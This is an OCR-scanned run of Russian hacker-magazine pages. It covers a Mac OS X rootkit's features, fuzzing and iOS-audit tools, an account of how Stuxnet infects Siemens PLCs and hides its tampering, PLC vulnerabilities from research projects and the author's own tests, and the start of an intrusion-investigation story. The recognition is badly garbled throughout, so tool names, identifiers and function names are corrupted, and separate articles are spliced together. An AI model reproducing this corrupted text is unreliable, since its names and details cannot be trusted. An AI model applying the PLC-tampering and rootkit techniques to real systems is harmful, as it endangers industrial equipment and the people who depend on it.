в открытом доступе. РиЫІуп ликвидирует про- 
бел — это кегпеі-руткит для Мае 05 X 64ЫЕ 
В своей работе руткит не использует ника- 
ких захардкоженных адресов для перехвата 
функций в В50-подсистеме, а скрывает свою 
активность с помощью зузсаІІ Ьоокіпд и ОКОМ. 
Все успешно работает и протестировано на 05 
X Ыоп и более младших версиях. 

Можно выделить следующие возможности 
руткита: 

• наличие консольного интерфейса; 

• выдача гоо1;-привилегий по РІО; 

• скрытие файлов и папок; 

• скрытие процессов; 

• скрытие пользователя отѵѵЬо/ѵѵ; 

• скрытие сетевых портов от пе1;з1;а1;; 

• зузсііі-интерфейс для взаимодействия 
с изегіапсі; 

• выполнениебинарниковсгооі;- 
привилегиями через ппадіе ІСМР ріпд. 

В грейтсах к этому полезному творению можно 
заметить хорошо известных в мире яблочной 
безопасности личностей: #пиІІзесигіІу сгеѵѵ, 
зпаге, сііпо, пето, ріоіг, а также іЬедгидд, не- 
давно посетившего конференцию 2егоМідЫз, 
посвященную техническим аспектам информа- 
ционной безопасности. 



ГОТОВИМСЯ К РѴѴМ20ѴѴМ 

бгіпсіег — полноценная платформа для авто- 
матического фаззинга веб-браузеров от од- 
ного из победителей Рѵѵп20ѵѵп 2011 (за взлом 
Іпіегпеі ЕхрІогегВ на 64-ЬіШіпсІоѵѵз 7 (5Р1)). 
Помимо фаззинга, система имеет впечатляю- 
щий функционал, отвечающий за управление 
большим количеством падений бедных бра- 
узеров. Платформа состоит из двух основных 
компонентов: бгіпсіег-нод и бгіпсіег-сервера. 
бгіпсіег-ноды отвечают за непосредственную 
автоматизацию фаззинга, генерирование 
полезной информации о падении, которая 
способна дать представление о его при- 
чине, возможность воспроизвести падение 
в дальнейшем и представление о возможности 
эксплуатации данного случая. Нода отвечает 
за фаззинг одного из поддерживаемых веб- 
браузеров: СЬготе, Ріге^ох, Іпіегпеі Ехріогег, 
5а1"агі. Одновременно можно запустить огром- 
ное количество различно настроенных нод. 
Огіпсіег-сервер представляет собой централи- 
зованное хранилище, в котором собирает все 
падения и информацию о них со всех работаю- 
щих Огіпсіег-нод. Сервер имеет веб-интерфейс 
и продвинутую многопользовательскую си- 
стему. Единственное, что остается сделать, — 
так это написать свой алгоритм фаззинга 
и вставить его в Сгіпсіег. Естественно, автор 
тулзы их не выложил в риЫіс, но оставил при- 
мер их написания для системы. 



МЕТОДИЧНЫЙ ПОДХОД к 105 АРР5 

5ІРА (5еті-аиІотаІесІ І05 РаріеІ Аззеззтепі) — 
это инструмент для оценки безопасности 
І05-приложений, который был представлен 
на ВІаск Наі ІІ5А2012. Программа состоит 
из двух частей: Ыпих-части, которая ставится 
на систему, и і05-части, которая устанавлива- 
ется прямо на )аіІЬгеак'нутый іРЬопе. 

Не секрет, что полностью автоматизи- 
ровать анализ приложения с качественным 
выходным результатом невозможно, и по- 
этому было решено автоматизировать все, 
что можно, а для того, что нельзя, сделать 
вспомогательные инструменты, облегчающие 
их выполнение при ручном тестировании. 
Программа предоставляет такие возможности 
при ручном тестировании: 

• созданиеснимка файловой системы; 

• сравнение двух снимков файловой системы; 

• анализ снимка файловой системы; 

• поискснимка файловой системы; 

• создание снимка экрана; 

• получение и расшифровка І05 КеусЬаіп ОВ; 

• анализ расшифрованного приложения. 

Также стоит выделить такой функционал, 
как СгиізеСопІгоІ, который представляет собой 
пошаговый аудит для самых маленьких, — шаг 
за шагом программа идет по всей разрабо- 
танной методологии оценки безопасности 
приложений. 
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Про безопасность промышленной автоматики в по- 
следнее время не говорит и не пишеттолько ленивый. 
Главный виновник повышенного внимания к этой теме, 
конечно же, РиІкіІ:.ѴѴіп32.5іихпе1.а. Мы тоже не оста- 
немся в стороне и посмотрим, что же это такое — про- 
граммируемые логические контроллеры (а именно они 
являются низшим исполнительным звеном в системах 
промышленной автоматики) и как на них можно вредо- 
носно воздействовать. 



Малварьдля 
промышленной 
автоматики 




ИССЛЕДУЕМ ВОЗМОЖНОСТИ 
ПРОГРАММИРУЕМЫХ 
ЛОГИЧЕСКИХ 
КОНТРОЛЛЕРОВ С ТОЧКИ 
ЗРЕНИЯ ВРЕДОНОСНОГО 
КОДИНГА 




ЗАЧЕМ НУЖНЫ ПРОГРАММИРУЕМЫЕ 
ЛОГИЧЕСКИЕ КОНТРОЛЛЕРЫ?! 



Если говорить строго и хотя бы частично использовать 
научный подход, то программируемый логический 
контроллер есть программно управляемый дискрет- 
ный автомат, имеющий некоторое количество входов 
с подключенными к ним датчиками, связанными с объ- 
ектом управления, и несколько выходов, связанных 
с исполнительными устройствами объекта управления. 
Контроллер отслеживает состояния входов и в за- 
висимости от их состояния выполняет определенную, 
программно заданную последовательность действий, 
изменяя состояние выходов. 

Впервые ПЛКбыли применены в 1969 году 
в США для автоматизации конвейерного сборочного 
производства в автомобильной промышленности. 
Сегодня ПЛК работают в энергетике, в области связи, 
в химической промышленности, в сфере добычи, транс- 
портировки нефти и газа, в коммунальном хозяйстве, да 
и вообще где угодно. На самом деле сфера применения 
ПЛК гораздо шире сферы применения персональных 




Малварь для промышленной автоматики 



✓ 





АРМ операторов ФСУ ТП 



Простейшая АСУ ТП и место ПЛ К в этой системе 



компьютеров, но как-то так получилось, что их 
работа совсем не видна и большинством людей 
воспринимается как нечто само собой разуме- 
ющееся. 

До поры до времени вопросы информацион- 
ной безопасности программируемых логических 
контроллеров и промышленной автоматики 
мало кого беспокоили. Оно и понятно: асушники 
(в смысле люди, которые занимаются разработ- 
кой автоматизированных систем управления) — 
люди конструктивные. Они программируют 
разные АСУ ТП и 5СА0А, читают умные книги, 
придумывают всякие алгоритмы контроля 
и мониторинга технологических процессов, 
и им некогда заниматься всякой деструктивной 
ерундой. Но, как говорится, в семье не без уро- 
да, и рано или поздно должны были появиться 
те, кто придумал и написал ЗіихпеС 



КАК ЭТО ДЕЛАЛ 5Т0ХМЕТ 
[ЧИТАЙ СПОКОЙНО, ЭТО НЕ БАЯН!) 



Как этот червь заражает компьютеры, какие 
уязвимости ѴѴіпсІоѵѵз использует в ходе своей 
вредоносной деятельности и даже кто и для чего 
его придумал, написано уже немало. Если эта 
информация обошла тебя стороной, можешь, на- 
пример, почитать статью Александра Матросова 
со товарищи «Зіихпеі СІпсІег іЬе Місгозсоре», 
которая лежит на диске, прилагающемся 
к этому номеру журнала. Вообще же Алексан- 
дру Матросову необходимо выразить большую 
благодарность, ибо без его помощи и содействия 
некоторые статьи могли бы и не появиться. 

Однако, несмотря на большое количество 
различных описаний этого высокотехнологично- 
го образца компьютерной заразы, информация 
о том, что же все-таки Зіихпеі делает непо- 



средственно с промышленными контроллерами 
от фирмы Віетепз, встречается нечасто. Думаю, 
на эту сторону вредоносной деятельности червя 
стоит обратить хотя бы немного внимания. 

Перед тем как начать излагать суть вопроса, 
необходимо слегка погрузиться в принципы про- 
граммирования ПЛК ВітаЛс 57. Вся программа 
в ПЛК делится на несколько блоков разных 
типов: 

1 . Организационные блоки ОВ. Выступают 

в качестве интерфейса между операционной 
системой и программой пользователя. Эти 
блоки вызываются операционной системой 
контроллера и управляютего поведением 
при старте, циклическим выполнением 
программы, обработкой прерываний и об- 
работкой ошибок. Например, блокОВІ 
является основной точкой входа в программу 
ПЛК и выполняется циклически, а, скажем, 
блок 0В84 вызывается при возникновении 
ошибки в памяти операционной системы 
ПЛК. 

2. Функциональные блоки и функции РВ и РС. 
Используются для построения программы 
из функциональнозаконченных процедур 
или подпрограмм с параметрами. 

3. Блоки данных ОВ. Назначение понятно 
из названия. Здесьхранятся константы 

и переменные, необходимые для выполне- 
ния программы. 

4. Системные блоки данныхБОВ. В них содер- 
жится информация о конфигурации ПЛК. 

Содержимое блоков наполняется и програм- 
мируется с помощью специального программно- 
го обеспечения под названием 5іер 7 с исполь- 
зованием различных языков, ориентированных 



на программирование промышленной автомати- 
ки (подробнее об этом во врезке). 

Скомпилированный ассемблерный код, 
который называется МС7, загружается из ком- 
пьютера в ПЛК, где запускается и выполняет 
свои функции (контро ль производственного 
процесса). 

В 5іер 7 связь компьютера с ПЛК органи- 
зована при помощи библиотеки з7оіЬхсІх.сІІІ. 
Например, когда из ПЛК необходимо считать 
какой-либо блок кода или данных, 5іер 7 вызы- 
вает из 57оШхс1х.с111 функцию 57Ык_геас1, которая 
считывает информацию из ПЛК и передает ее 
5іер 7. Всего в этой библиотеке реализовано 109 
различных функций для взаимодействия с ПЛК. 
При заражении компьютера с установленным 
на нем 5іер 7 Зіихпеі подменяет оригинальный 
файл библиотеки 57оіЬхсІх.сІІІ своим, который он 
хранит в виде ресурсов в своем теле. При этом 
оригинальный файл также остается на компью- 
тере жертвы, но уже в переименованном виде: 
57оіЬх5х.сііі. в подмененном файле 57оШхс1х. 
сІІІ большинство (а если быть точным — 93) 
функций просто переадресуются на те же 
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функции в оригинальном файле и выполняются 
как ни в чем не бывало. Оставшиеся функции 
червь перехватывает своей подмененной библи- 
отекой. Вот эти функции: 

57_еѵеп1: 

57а§_ЬиЬ_сус1_геасІ_сгеа1;е 

57а§_ЬиЬ_геасІ_ѵаг 

57 а^_Ь иЬ_ыгі1 :е_ ѵаг 

57а§_1іпк_іп 

57 а^_геасІ_ 52 І 

57а^_1:е5І: 

57Ык_сІе1е1:е 

57Ык_бпсІбг5І: 

57Ык_1іпсІпех1: 

57Ык_геасІ 

57Ык_ыгі1;е 

57 сІЬ_сІ 05 е 

57сІЬ_ореп 

57а§_ЬиЬ_геасІ_ѵаг_5е§ 

57а§_ЬиЬ_ыгі1;е_ѵаг_5е§ 

Контролируя выполнение этих функций, 
ЗШхпеІ способен модифицировать данные, по- 
сланные с компьютера на ПЛК и обратно, инфи- 
цировать ПЛК, внедряя в него свой вредоносный 
код или изменяя существующие блоки, а также 
прятать внедренный в ПЛК вредоносный код. 

Заражение ПЛК начинается с провер- 
ки блоков 50В. Для заражения выбираются 
только определенные конфигурации, а кон- 
кретно — ПЛК типа 6Е57-31 5-2. Кроме этого, 
в блоках 50В, конфигурирующих шину обмена 
с внешними устройствами РгобЬиз, ищутся 



определенные идентификационные номера 
устройств, с которыми должен производиться 
обмен заражаемого ПЛК. Эти идентификацион- 
ные номера назначаются всем производителям 
оборудования ассоциацией РгобЬиз & Ргобпеі 
ІпІегпаЛопаІ для каждого типа устройств. Своей 
целью 5іихпеІ выбирает устройства с идентифи- 
кационными номерами 7050И и 9500И, назна- 
ченными частотным преобразователям, которые 
производятся двумя разными фирмами — одна 
из них базируется в Иране, вторая в Финлян- 
дии (частотные преобразователи используются 
для регулировки скорости вращения валов 
асинхронных электродвигателей). 

Если подходящий для заражения контроллер 
найден, то в первую очередь происходит пере- 
хват функционального блока 0Р_РЕСѴ, который 
отвечает за обмен по шине РгобЬиз. Оригиналь- 
ный блок 0Р_РЕСѴ копируется в созданный 
червем функциональный блок РС1869, а на его 
место пишется вредоносный код, и каждый раз, 
когда вызывается ОР_РЕСѴдля чтения пакета 
из шины, этот вредоносный код берет на себя 
управление, вызывает оригинальный блок 
и далее обрабатывает и фильтрует полученные 
пакеты от частотных преобразователей. Таким 
образом, можно запросто скрыть истинное со- 
стояние частотных преобразователей и показать 
оператору все что угодно. Помимо этого, 5іихпеІ 
заражает два организационных блока — 0В1 
и ОВ35. Блок 0В1, как мы уже говорили, — это 
основная точка входа в программу ПЛК. Блок 
ОВ35 — стандартный сторожевой блок, который 
выполняется системой каждые 100 мс. В нем 
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Результаты исследований компании Оідііаі ВопсІ в рамках 
проекта Вазесатр 

обычно программируется мониторинг каких-ни- 
будь критических входов с жестким временным 
графиком. 

Для инфицирования этих блоков использу- 
ется метод записи вредоносного кода в начало 
блока. Алгоритм заражения простой и аналоги- 
чен алгоритму, который применяется в файло- 
вых вирусах: сначала сохраняется оригинальное 
содержимое блока, затем увеличивается размер 



НА ЧЕМ ПРОГРАММИРУЮТ ПЛК 



Все, что касается языков программирования для ПЛК, определено стан- 
дартом МЭК (ІЕС) 61131-3. В этот стандарт входят пять языков: 

• (Іасісіег Оіадгат) — вариант класса языков релейно-контактных 
схем. Графический язык, элементами которого являются контакты, 
катушки реле, вертикальные и горизонтальные соединения и другие 
элементы. 

• РВО (Рипсііоп ВІоск Оіадгат) — аналогичен функциональной схеме 
электронного устройства. Графический язык высокого уровня, 
позволяющий управлять потоками данных разныхтипов и ис- 
пользовать большую библиотеку блоков, реализующих различные 
алгоритмы управления. 

• 5РС (Бедиепііаі Рипсііоп СЬагІ) — графический язык, аналогичный 
блок-схемам алгоритмов. Удобен для программирования как после- 
довательных, так и параллельных процессов. 

• 5Т (5(гис(игесі Техі) — текстовый высокоуровневый язык, по син- 
таксису напоминающий Паскаль. Код, написанный с его примене- 
нием, хорошо структурирован и обладает отличной читабельностью, 
особенно если используются понятные имена переменных. 

• II (ІП5(гис(іоп ІІ5І) — текстовый язык низкого уровня, аналогичный 
ассемблеру. Обычно используется для написания высокоэффектив- 
ных и оптимизированныхучастков кода. 

ІЕС 61131-3, помимо самих языков программирования ПЛК, опреде- 
ляет их синтаксис, вид объектов, структуру программы и объявления 
переменных. 



Многие производители ПЛК выпускают собственные средства раз- 
работки программ для своих контроллеров, соответствующие стан- 
дарту (например, 5і;ер 7 от Біеппепб, ѴѴРЕБоЙ для ПЛК ОеНа или Сопсері; 
от БсЬпеісІег Е1ес1;гіс), однако существуют и универсальные средства 
разработки для ПЛК разных производителей (к примеру, один из широ- 
ко распространенных пакетов — СоОеБув от компании 35). 




Код, написанный, вернее нарисованный :), на языке 10 в среде разработки СоОеЗуз 
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блока, далее в начало пишется вредоносный 
код, и дописывается ранее сохраненное ориги- 
нальное содержимое блока. 

В коде, который внедряется в 0В1 и ОВ35, 
реализована вся логика работы червя: в основ- 
ном она заключается в скрытом управлении 
частотными преобразователями и, соответствен- 
но, изменении скорости вращения электродви- 
гателей по определенному алгоритму. В то же 
время благодаря перехвату блока 0Р_РЕСѴ факт 
вредоносного воздействия на преобразователи 
скрывается, и ничего не подозревающий опера- 
тор видит у себя на экране автоматизированного 
рабочего места нормально функционирующий 
частотный преобразователь и штатную скорость 
вращения электродвигателя. 

Как видим, для заражения ПЛК ВШхпеІ 
использует обычные приемы, ставшие уже 
классикой при создании вредоносных программ 
для обычных компьютеров, — это и пере- 
хват функций для скрытия результатов своей 
деятельности (своего рода руткит), и внедрение 
вредоносного кода в начало блока с последу- 
ющей дозаписью оригинального содержимого, 
и передача управления на него после выполне- 
ния вредоносных функций (по аналогии с файло- 
выми вирусами). 



АЧТО ДРУГИЕ?... 



Не так давно группа исследователей из амери- 
канской компании Оідііаі Вопб продемонстриро- 
вала всему сообществу специалистов в области 
автоматизации и информационной безопас- 
ности, что возможности вредоносного воздей- 
ствия на системы промышленной автоматики 
не ограничиваются одним только червем Зіихпеі 
и ПЛК серии 5ітаЛс 57-300. В рамках проекта 
под названием Вазесаппр были исследованы 
шесть ПЛК разных производителей на предмет 
наличия в них уязвимостей: 

• бепегаі Еіесігіс О20МЕ; 

• Коуо0ігесіЕ06ІСН4-Е5; 

• РоскѵѵеІІ АиІіотаЛоп АІІеп-ВгасІІеу 
СопІігоІЕодіх; 

• РоскѵѵеІІ АиІіоппаЛоп АІІеп-ВгасІІеу 
МісгоЕодіх; 

• 5сЬпеісІегЕІес1;гіс Мосіісоп Оиапіипп; 

• 5сЬѵѵеі1;2ег5ЕЕ-2032 (коммуникационный 
модуль). 

Наибольшее количество уязвимостей собрал 
ПЛК СепегаІ Еіесігіс О20МЕ (кстати, самый до- 
рогой в списке). На его счету: неавторизованный 
доступ и чтение программы из ПЛК, просмотр 
процессов в памяти, чтение и запись произволь- 
ных участков памяти, доступ к конфигурацион- 
ной информации, в том числе к учетным данным, 
позволяющим получить полный контроль над 
всей системой. 

Следующий подопытный — ПЛК Коуо Оігесі 
Е06ІС Н4-Е5 — имеет схожие с О20МЕ уязвимо- 
сти, но выглядит более защищенным и по край- 
ней мере при попытке чтения или записи про- 
граммы из ПЛК требует пароль. В веб-сервере, 
имеющемся на борту этого ПЛК, есть уязвимость, 
позволяющая менять ІР или е-таіі, по которым 
производится рассылка тревожных сообщений. 



ЕШ 

Респект техниче- 
скому руководству 
компании «Экомаш- 
групп^зато, что они 
сделали вид, будто 
не заметили моих 
«шалостей» с до- 
рогостоящим обору- 
дованием (Евгений, 
с оборудованием-то 
шалить можно, 
главное — в храмах 
не танцуй! — Прим, 
ред.). 

Вот так можно остановить выполнение программы в ОеКа ОѴР-40Е5200 





Ищи на диске описа- 
ние Зіихпеі от анти- 
вирусной компании 
Е5ЕТ. Несмотря 
на английский 
язык, подлежит 
обязательному про- 
чтению. 



ПЛК Мосіісоп Оиапіит от фирмы ЗсЬпеісІег 
Еіесігіс «порадовал» исследователей наличием 
паролей по умолчанию для смены прошивки 
и возможностью неавторизованного доступа 
к пользовательской программе в ПЛК. Также 
веб-сервер этого ПЛК передает всю информа- 
цию (в том числе и учетные данные для доступа 
в систему) в открытом виде, а наличие еще од- 
ной уязвимости (в организации РТР-протокола) 
позволяет все это перехватить. 

Контроллеры от РоскѵѵеІІ АиІотаЛоп (АІІеп- 
ВгасІІеу) и 5сЬѵѵеіІ2ег таят в себе уязвимости, 
аналогичные уязвимостям в ПЛК Мосіісоп 
Оиапіит. Также стоит отметить, что парни 
из Оідііаі Вопб не ограничились просто поиском 
уязвимостей: после их исследования уязвимо- 
сти в ПЛК бепегаі Еіесігіс О20МЕ, Коуо Оігесі 
Е06ІС Н4-Е5, РоскѵѵеІІ АиІотаЛоп АІІеп-ВгасІІеу 
СопІгоІЕодіх и ЗсЬпеісІег Еіесігіс Мосіісоп 
Оиапіит обрели вполне рабочие эксплойты, 
которые уже вошли в состав актуальной версии 
МеІазрІоіТа. 

Исследовательский центр Оідііаі Зесигііу 
РезеагсЬ бгоир в рамках поддержки Вазесаппр 
также поделился результатами своих изыска- 
ний на ниве поиска уязвимостей в системах 
промышленной автоматики. Были исследованы 
ПЛК ѴѴадо серии 750 и Тесотаі РЕС. 

В ПЛК от ѴѴадо установлены пароли по умол- 
чанию, возможно неавторизованное чтение 
программы и некоторой системной информации 
из ПЛК через веб-интерфейс, а также возмож- 
на смена пароля через вредоносную ссылку. 

На контроллерах Тесотаі РЕС установлены 
пароли по умолчанию. 



НАШ ВКЛАД в ПРОБЛЕМУ 



Твой любимый журнал никак не мог остаться 
в стороне в то время, когда вся прогрессивная 
общественность ковыряет ПЛК. Благодаря 
тому что в мои руки попал контроллер ОеКа 



ОѴР-40Е5200, у меня появилась возможность 
внести свою лепту в дело поиска уязвимостей 
в системах промышленной автоматики. Итак, 
что мы имеем. 

• В ПЛК ОеНа ОѴР-40Е5200 есть возможность 
защитить пользовательскую программу 
паролем, но, во-первых, стойкость этого 
пароля оставляетжелать лучшего (всего 
четыре символа), а во-вторых, этот пароль 
защищает программу только от чтения ее 

из ПЛК и никак не мешаетсбросить конфигу- 
рацию ПЛКдо заводских настроек и залить 
в него другую программу. 

• Возможен неавторизованный перевод 
контроллера из режима «Работа» в режим 
«Стоп», при котором выполнение программы 
и, соответственно, управление исполнитель- 
ными механизмами останавливается. 

• При удаленном доступе к ПЛК через 65М- 
модем никакой авторизации нетребуется 
и доступ к ПЛК возможен с любого номера 
телефона, главное — знать номертелефона 
(55М-модема, подключенного к ПЛК. 

В принципе, этого достаточно для соверше- 
ния множества вредоносных «подвигов». Осо- 
бенно «порадовал» неавторизованный доступ 
через (35М-модем. 



ЗАКЛЮЧЕНИЕ 



Строго говоря, все эти бреши, дыры и уязвимости 
в ПЛК, о которых мы говорили, до определенного 
момента таковыми и не являлись, поскольку 
до них никому не было дела. Основной упор 
при создании АСУТП делался на производи- 
тельность, экономию средств, на все что угодно, 
кроме информационной безопасности. И никому 
в голову не могло прийти, что кто-то посторонний 
захочет залезть в эти системы и что-нибудь там 
натворить. Но все течет, все меняется, и теперь 
пришло время об этом подумать... 



В РАМКАХ ПРОЕКТА ПОД НАЗВАНИЕМ 
ВА5ЕСАМР БЫЛИ ИССЛЕДОВАНЫ 
ШЕСТЬ ПЛК РАЗНЫХ ПРОИЗВОДИТЕЛЕЙ 
НА ПРЕДМЕТ НАЛИЧИЯ В НИХ УЯЗВИМОСТЕЙ 
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МАШАІІЕ 



Ник Дыминский (сіитіпзку.піскйдтаіі.сот) 



Детектив 
для безопасника 



ПРО МАЛВАРЬ, КОТОРАЯ 
САМА СОБОЙ НЕ ПОЯВЛЯЕТСЯ 

В этой статье ты не встретишь никакой технической 
информации. Ее и так много в нашем журнале. Сегодня мы 
расскажем о том, как это бывает просто в жизни. На практике, 
которая, как говорится, очень далека от идеальной теории. 



лучилась как-то у нас весьма непри- 
ятная история. Если коротко, то было 
установлено, что периметр сети прой- 
ден и ІТ-отделу оставлен «подарочек» на шлюзе. 
Посредством МІТМ-атаки он скомпрометировал 
кучу паролей к нашим серверам, на которых 
жила святая святых — деловая переписка, кли- 
ентская база, проекты в пресейле и в работе. 

Характер «подарочка» ясно давал понять, 
что проникновение было сделано не шутки ради, 
а вполне себе по заказу. Между ІТ-отделом 
и службой ИБ были более-менее мирные 
рабочие взаимоотношения. Это сильно помогло 
на начальном этапе — слишком часто сведения 
о таких находках остаются внутри ІТ-отдела, 
а админы просто вышибают злоумышленника 
из сети и не озабочиваются путями проникно- 
вения. Да, все конфигурации всех межсетевых 
экранов и ІР5 и политики антивирусов тщательно 
анализируются, операционные системы обновля- 
ются до последних версий, но частенько усилия 
оказываются направлены не в ту сторону. Вы- 
явить пути проникновения мог бы полноценный 
пентест, но это весьма затратное мероприятие, 
на которое у вас вряд ли получится выбить день- 
ги с обоснованием «на всякий случай». В общем, 
наш отдел ИБ был «поставлен в известность». 

История умалчивает о том, что сказали друг 
другу наши начальники, но решение было при- 
нято однозначное — нужно сообщить руковод- 
ству. Чтобы не подставить какой-то из отделов, 
на доклад пошли представители обоих подраз- 
делений. Реакция руководства на информацию 
о взломе была вполне ожидаемой и предсказуе- 
мой. Началось криком и обещаниями разогнать 



всех к известной матери, а закончилось логич- 
ным вопросом — что нам, собственно говоря, 
с этим всем делать. 

Перво-наперво решили: информация 
о взломе не должна уйти из отделов ИТ и ИБ, 
а в идеале — даже в отделах знать об этом 
должен ограниченный круг лиц. Информация, 
имеющая отношение к инциденту, сохранялась 
в криптоконтейнере, ключи раздавались под 
подпись. На самом деле это чрезвычайно тяже- 
лый этап работы, причем психологически тоже: 
многие специалисты стремятся похвастаться 
сложными задачами, блеснуть знаниями — и это 
прекрасно. Но только пока дело не доходит 




до ситуации, когда инсайдером может оказаться 
один из сисадминов или безопасников — людей, 
которым в организации приходится доверять. 

С нашей точки зрения, положение осложнялось 
еще и тем, что взять подписку или составить 
соглашение было затруднительно — все такие 
документы проходят через кадры, а четкие фор- 
мулировки, что именно нельзя распространять, 
выдадут все секреты с головой. 

Пережив это, весьма неприятное, совещание 
у начальства и окончательно уяснив картину, 
руководители двух отделов решили сформировать 
единую «следственную группу», которая будет 
осторожно собирать информацию о произошед- 
шем и принимать дальнейшие решения. Не будем 
забывать, что задача перед нами стояла не просто 
перекрыть существующий канал утечки, а понять, 
как это произошло. Первоначальный план дей- 
ствий был таков: определить, как закладка попала 
в сеть и куда отсылаются скомпрометированные 
пароли. И если вторая задача была чисто техниче- 
ской и решалась довольно просто (адрес сервера 
был жестко прописан в конфиг-файле, видимо, 
перенастройка при раскрытии не предусматри- 
валась), то определить, как и когда произошел 
взлом, было уже не так просто. 

Кроме того, нужно было понять, насколько 
опасен этот взлом. К счастью, в нашем случае 
это было довольно просто — компрометиро- 
вание атрибутов доступа к серверам вряд ли 
является чьей-то невинной шалостью. 

Поняв, насколько ситуация опасна, можно 
предпринимать дальнейшие шаги, все так же 
стараясь держать дело в тайне. Даже если 
целью взлома и не было причинить вред ком- 
пании, распространение сведений о нем может 
нанести урон само по себе. Клиенты начинают 
относиться с опаской, заказчики и исполни- 
тели — обдумывать все по десять раз. Все это 
непрямые убытки компании, которых надо избе- 
жать всеми способами. Кроме того, если до воз- 
можного инсайдера дойдут слухи о ведущемся 
расследовании, то он, скорее всего, постарается 
отвести подозрения от себя и/или подставить 
других коллег. Также, если злоумышленник 
заподозрит, что нам известно о его действиях, 
он может попробовать замести следы или же 
просто распространить информацию о происше- 
ствии в наиболее выгодном для себя (и невыгод- 
ном для нас) свете. 
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Итак, на следующий день после обнаружения 
взлома мы имели следующее: 

1. Анализ сервера информации о времени 
взлома недал. 

2. Объем полученной злоумышленником 
информации — неизвестен. 

3. Цели злоумышлен ника — неизвестны. 

4. Анализуправляющего сервера 
ничего недал. 

5. Установленноезлоумышленником ПО 
не отличается сложностью. 

Что из этого можно извлечь? Почти ничего. 
Тем не менее удалось сделать кое-какие выво- 
ды, собрав воедино следующие факты: 

1. Совершенный не вчера взлом наши ИТ- 
специалисты проморгали. 

2. В конфигурацию периметрового оборудова- 
ния были внесены незначительные измене- 
ния, которые позволили трафику от закладки 
спокойно достигать адресата. Стоит также 
отметить, что все соединения иницииро- 
вались изнутри, — сам командный сервер 
внутрь не стучался и передавал команды 
(если передавал) только позапросу. 

3 Злоумышленники, скорее всего, точнознали 
расположение цели внутри организации, 
а направление атаки говоритотом, что им, 
вероятнее всего, было необходимо предоста- 
вить доступ к конфиденциальной инфор- 
мации кому-то внутри периметра, причем 
замаскировав это под атаку снаружи. 

Выводы были таковы: анализ конфигура- 
ционных файлов периметрового оборудования 
и времени их изменений дал примерный про- 
межуток времени, когда была установлена за- 
кладка, — а значит, и был организован взлом. 
Конфигурация периметрового оборудования 
меняется не так часто, и все изменения конфи- 
гураций всегда легируются, а резервные копии 
нескольких вариантов конфигурации в обяза- 
тельном порядке сохраняются на независимом 
хранилище — с указанием того, когда данный 
файл конфигурации был создан и чем отличает- 
ся от предыдущего. В свое время наш ИТ-отдел 
отчаянно сопротивлялся такой мере, но сегодня 
именно эта бюрократия и принесла свои плоды. 
К сожалению, не все изменения конфигурации 
были сохранены, как предписывалось, — когда 
наши безопасники устроили опрос админов 
под видом анализа выполнения требований 
корпоративных политик, люди признавались 
в том, что изменяли настройки по требованиям 
начальников отделов, да и просто для себя, 
чтобы им было удобнее. Получить эти призна- 
ния нам помог начальник ИТ-отдела. Он был 
в курсе того, зачем мы на самом деле произ- 
водим эту проверку, и мог надавить на своих 
подчиненных. 

Зачем нужен был цирк с конспирацией? 

Это самое интересное. Дело в том, что, исходя 
из характера атаки, мы только сильнее и силь- 
нее убеждались: в ИТ-отделе сидит нелояльный 
сотрудник, который и помог злоумышленнику 
провернуть такую операцию. Более того — то, 
что командный сервер никогда не инициировал 



соединения, служило доказательством, что ин- 
сайдер не просто помог злоумышленнику, а сам 
произвел атаку изнутри. Именно это и застави- 
ло нас поиграть в КГБ (по выражению одного 
из админов). 

Почему мы подумали на админов, 
а не на кого-то из других сотрудников? Не то 
чтобы у нас абсолютно доверяли всем, кроме 
ИТ-специалистов. Просто обстоятельства 
говорили о том, что взлом производил чело- 
век, с одной стороны, хорошо осведомленный 
об организации ИТ-инфраструктуры, а с дру- 
гой — не очень хорошо знающий, какая инфор- 
мация наиболее важна для компании. Если бы 
кто-то из инженеров или менеджеров решил 
слить информацию налево — им бы не соста- 
вило труда просто скачать актуальные данные 
по текущим проектам. Более того, никто из них 
не знал, как проходит трафик до серверной 
группы, — чтобы узнать это, им потребовалось 
бы приложить определенные усилия, и это, ско- 
рее всего, попало бы в поле зрения ИТ-отдела. 
Админ же, наоборот, прекрасно знал о том, что 
и как работает в нашей сети, но поиск актуаль- 
ной информации занял бы у него определенное 
время. Так что все следы вели в ИТ-отдел. 




Таким образом, за несколько дней после 
обнаружения взлома мы собрали всю инфор- 
мацию, какую могли, не привлекая внимания 
злоумышленника. Дальнейшие действия было 
необходимо согласовывать с руководством, 
поскольку решать, что делать дальше — просто 
провести внутренний аудит и прибить закладку, 
привлекать к работе специалистов из сторонних 
организаций или вообще обращаться в орга- 
ны, — должны были руководители компании. 

Скажу сразу, что вариант обратиться к специ- 
алистам был отметен с ходу (с кучей нелице- 
приятных выражений в адрес обоих отделов). 
Когда была прикинута стоимость работ, то нам 
припомнили сразу все — и предыдущие работы, 
и внедрение политик безопасности, от которых 
все отделы первое время выли волком, и после- 
дующие закупки «на безопасность». Ощущение 
от разговора осталось весьма неприятное, хотя 
я лично там и не был. Но содержание его наши 
начальники до нас довели, что называется, 

«по горячим следам», так что комментарии 
излишни. Какое-то время мы думали, стоит 
ли обратиться во внутренние органы. Как мы 
все прекрасно понимали — с учетом нашей ІТ- 
специфики, мы могли просто не замечать того, 
что происходит по другую сторону экрана. Но за- 
ставить себя выйти из привычной схемы мыш- 
ления в стрессовой ситуации, полумертвыми 
от усталости и с убитой последними событиями 
мотивацией оказалось невозможно. По крайней 
мере, у нас это не получилось. Но вариант офи- 
циального обращения в органы был отброшен. 
Мы не хотели рисковать тем, что работа компа- 
нии будет парализована во время расследова- 
ния. А поскольку, по нашим представлениям, 
в числе подозреваемых мог оказаться кто угод- 
но, то таскания на допросы могли значительно 
снизить лояльность сотрудников, тем более — 
сотрудников ИБ и ИТ, которые были первыми 
подозреваемыми. А наша лояльность и так была 
на уровне плинтуса — сказывались и усталость, 
и нервное напряжение, и висевшее в воздухе 
недоверие. 

Иными словами, мы оказались в тупике. Всю 
информацию о взломе, какую могли, мы собрали. 
Возможно, профессионалы собрали бы больше, 
но на профессионалов денегу нас не было. Об- 
ращаться в органы не было никакого резона — это 
только осложнило бы положение. Атмосфера ца- 
рила подавленная, и ни о какой активной деятель- 
ности никто и не думал. Честно говоря, у многих 
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проснулись весьма упаднические настроения: 
после такого косяка можно было ожидать вполне 
серьезных репрессий со стороны руководства — 
и не просто выговоров, к которым все привыкли. 
Дошло до того, что сотрудники начали обновлять 
резюме, хотя нашим специалистам увольнение 
в таких условиях не обещало ничего хорошего. 

А потом случилось то, что у японцев назы- 
